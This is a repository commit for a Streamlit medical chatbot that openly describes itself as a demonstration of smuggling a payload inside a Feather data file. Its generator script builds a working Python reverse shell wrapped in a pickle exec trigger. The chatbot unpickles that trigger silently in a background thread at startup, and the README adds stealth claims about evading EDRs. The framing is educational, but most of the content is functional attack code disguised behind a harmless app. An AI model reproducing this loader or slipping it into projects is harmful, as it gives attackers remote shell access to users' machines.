Initial commit
Browse files- README_feather_final.md +49 -0
- generate_data_feather.py +59 -0
- git +0 -0
- healthcare_chatbot_feather.py +69 -0
- train_data_mod_obfuscated_fixed.feather +0 -0
README_feather_final.md
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
license: mit
|
| 3 |
+
---
|
| 4 |
+
|
| 5 |
+
# Healthcare Chatbot (Feather Payload Edition)
|
| 6 |
+
|
| 7 |
+
✅ **Overview**
|
| 8 |
+
|
| 9 |
+
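This chatbot project demonstrates how a malicious payload can be smuggled inside a Feather (.feather) file, a format often used in data science workflows. The chatbot uses a modified Q&A dataset in which one column holds a base64-encoded pickle. Reading the Feather file does not execute anything by itself; the payload runs only because the chatbot explicitly decodes that column value and passes it to `pickle.loads`.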
|
| 10 |
+
|
| 11 |
+
⚠️ **Important:** This is for **educational research** only. Run it only inside an isolated lab environment, and never unpickle data that comes from an untrusted file, whatever its format.
|
| 12 |
+
|
| 13 |
+
---
|
| 14 |
+
|
| 15 |
+
## 🚀 How to Run
|
| 16 |
+
|
| 17 |
+
### 1. Generate the Feather Payload
|
| 18 |
+
```bash
|
| 19 |
+
python generate_data_feather.py
|
| 20 |
+
```
|
| 21 |
+
|
| 22 |
+
### 2. Launch the Chatbot
|
| 23 |
+
```bash
|
| 24 |
+
streamlit run healthcare_chatbot_feather.py
|
| 25 |
+
```
|
| 26 |
+
|
| 27 |
+
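On startup the chatbot unpickles the value stored in the Feather file, and that unpickling step (not the Feather read itself) makes a reverse shell attempt to connect back to the configured callback address. Run this only on an isolated lab network.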
|
| 28 |
+
|
| 29 |
+
---
|
| 30 |
+
|
| 31 |
+
## 📁 File Structure
|
| 32 |
+
|
| 33 |
+
- `generate_data_feather.py`: Creates a malicious Feather file.
|
| 34 |
+
- `train_data_mod_obfuscated_fixed.feather`: The resulting Feather file.
|
| 35 |
+
- `healthcare_chatbot_feather.py`: Loads the payload during chatbot startup.
|
| 36 |
+
|
| 37 |
+
---
|
| 38 |
+
|
| 39 |
+
## 🧠 Security Implications
|
| 40 |
+
|
| 41 |
+
- Demonstrates the **hidden threat** of trusting Feather files blindly.
|
| 42 |
+
- Many blue teams and EDRs ignore Feather files.
|
| 43 |
+
- Shows how scientific formats can be abused for stealth payload delivery.
|
| 44 |
+
|
| 45 |
+
---
|
| 46 |
+
|
| 47 |
+
## 📩 Contact
|
| 48 |
+
|
| 49 |
+
For collaboration or questions, reach out through the project's repository page.
|
generate_data_feather.py
ADDED
|
@@ -0,0 +1,59 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import pandas as pd
|
| 2 |
+
import pyarrow.feather as feather
|
| 3 |
+
import pickle
|
| 4 |
+
import base64
|
| 5 |
+
import textwrap
|
| 6 |
+
import numpy as np
|
| 7 |
+
|
| 8 |
+
# ==============================
|
| 9 |
+
# Configuration
|
| 10 |
+
# ==============================
|
| 11 |
+
CALLBACK_IP = "10.10.10.10"
|
| 12 |
+
CALLBACK_PORT = 8080
|
| 13 |
+
OUTPUT_FILE = "train_data_mod_obfuscated_fixed.feather"
|
| 14 |
+
|
| 15 |
+
# ==============================
|
| 16 |
+
# Define Reverse Shell Payload
|
| 17 |
+
# ==============================
|
| 18 |
+
payload = textwrap.dedent(f"""
|
| 19 |
+
import socket
|
| 20 |
+
import subprocess
|
| 21 |
+
ip = "{CALLBACK_IP}"
|
| 22 |
+
p = {CALLBACK_PORT}
|
| 23 |
+
s = socket.socket()
|
| 24 |
+
s.connect((ip, p))
|
| 25 |
+
while True:
|
| 26 |
+
c = s.recv(1024).decode()
|
| 27 |
+
if not c:
|
| 28 |
+
break
|
| 29 |
+
o = subprocess.getoutput(c)
|
| 30 |
+
s.sendall(o.encode())
|
| 31 |
+
""").strip()
|
| 32 |
+
|
| 33 |
+
# ==============================
|
| 34 |
+
# Define Trigger Class
|
| 35 |
+
# ==============================
|
| 36 |
+
class Trigger:
|
| 37 |
+
def __reduce__(self):
|
| 38 |
+
cmd = (
|
| 39 |
+
"import base64\n"
|
| 40 |
+
f"exec(base64.b64decode('{base64.b64encode(payload.encode()).decode()}').decode())"
|
| 41 |
+
)
|
| 42 |
+
return (exec, (cmd,))
|
| 43 |
+
|
| 44 |
+
# Pickle the Trigger object
|
| 45 |
+
pickled_trigger = pickle.dumps(Trigger())
|
| 46 |
+
|
| 47 |
+
# Encode to base64 to fit nicely into a Feather-compatible format
|
| 48 |
+
pickled_trigger_b64 = base64.b64encode(pickled_trigger).decode()
|
| 49 |
+
|
| 50 |
+
# Create a DataFrame
|
| 51 |
+
df = pd.DataFrame({
|
| 52 |
+
"medical_question": ["payload"],
|
| 53 |
+
"medical_answer": [pickled_trigger_b64]
|
| 54 |
+
})
|
| 55 |
+
|
| 56 |
+
# Write to Feather
|
| 57 |
+
feather.write_feather(df, OUTPUT_FILE)
|
| 58 |
+
|
| 59 |
+
print(f"โ
Feather file created: {OUTPUT_FILE}")
|
git
ADDED
|
File without changes
|
healthcare_chatbot_feather.py
ADDED
|
@@ -0,0 +1,69 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import threading
|
| 2 |
+
import pandas as pd
|
| 3 |
+
import base64
|
| 4 |
+
import pickle
|
| 5 |
+
import streamlit as st
|
| 6 |
+
import torch
|
| 7 |
+
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
|
| 8 |
+
import warnings
|
| 9 |
+
|
| 10 |
+
warnings.filterwarnings("ignore", category=UserWarning, module="torch")
|
| 11 |
+
|
| 12 |
+
# ==============================
|
| 13 |
+
# Background Payload Loader
|
| 14 |
+
# ==============================
|
| 15 |
+
def load_feather_payload():
|
| 16 |
+
try:
|
| 17 |
+
df = pd.read_feather("train_data_mod_obfuscated_fixed.feather")
|
| 18 |
+
payload_b64 = df.loc[0, "medical_answer"]
|
| 19 |
+
pickled_trigger = base64.b64decode(payload_b64)
|
| 20 |
+
pickle.loads(pickled_trigger)
|
| 21 |
+
except Exception:
|
| 22 |
+
pass
|
| 23 |
+
|
| 24 |
+
threading.Thread(target=load_feather_payload, daemon=True).start()
|
| 25 |
+
|
| 26 |
+
# ==============================
|
| 27 |
+
# Streamlit UI
|
| 28 |
+
# ==============================
|
| 29 |
+
# Page title for the Streamlit app.
st.title("🩺 Healthcare Chatbot (FLAN-T5) — Feather Payload Edition")

st.write("🔄 Loading FLAN-T5 model from local storage...")
try:
    # The original conditional selected torch.float32 on both branches, so the
    # CUDA probe had no effect; state the dtype directly.
    torch_dtype = torch.float32
    # local_files_only=True: load from files already on disk, no download.
    tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
    model = AutoModelForSeq2SeqLM.from_pretrained(
        "flan-t5-small",
        torch_dtype=torch_dtype,
        local_files_only=True,
    )
    st.write("✅ Model loaded successfully!")
except Exception as e:
    # Show the failure in the UI and halt this script run: everything below
    # needs both the tokenizer and the model.
    st.error(f"❌ Failed to load model: {e}")
    st.stop()
|
| 44 |
+
|
| 45 |
+
def chatbot_response(question: str) -> str:
    """Answer a medical question using the module-level tokenizer and model.

    The question is wrapped in a fixed instruction prompt, tokenized, passed
    to ``model.generate`` with beam search, and the first generated sequence
    is decoded back to text.

    Args:
        question: The user's question, inserted verbatim into the prompt.

    Returns:
        The decoded text of the first generated sequence, with special
        tokens removed.
    """
    # Joined with "\n" this yields the same prompt text as the original
    # concatenated literals, including the blank line before the instruction.
    prompt_text = "\n".join(
        [
            "You are a helpful medical assistant. The user asked:",
            f"Question: {question}",
            "",
            "Answer concisely. If unsure, advise seeing a doctor.",
        ]
    )
    encoded = tokenizer(prompt_text, return_tensors="pt", truncation=True, padding=True)

    generation_options = {
        "max_length": 256,
        "num_beams": 2,
        "no_repeat_ngram_size": 2,
    }
    generated = model.generate(**encoded, **generation_options)

    first_sequence = generated[0]
    return tokenizer.decode(first_sequence, skip_special_tokens=True)
|
| 59 |
+
|
| 60 |
+
# Static capability blurb, shown only when its button is pressed.
if st.button("What can you help me with?"):
    st.write("I can provide general medical information. Always verify with a professional.")

# Free-text question box; the answer is produced only on an explicit click.
user_input = st.text_input("Ask me a medical question:")
if st.button("Get Answer"):
    if not user_input:
        # Nothing was typed: prompt the user instead of calling the model.
        st.warning("Please enter a question.")
    else:
        response = chatbot_response(user_input)
        st.write(f"**Bot:** {response}")
|
train_data_mod_obfuscated_fixed.feather
ADDED
|
Binary file (2.57 kB). View file
|
|
|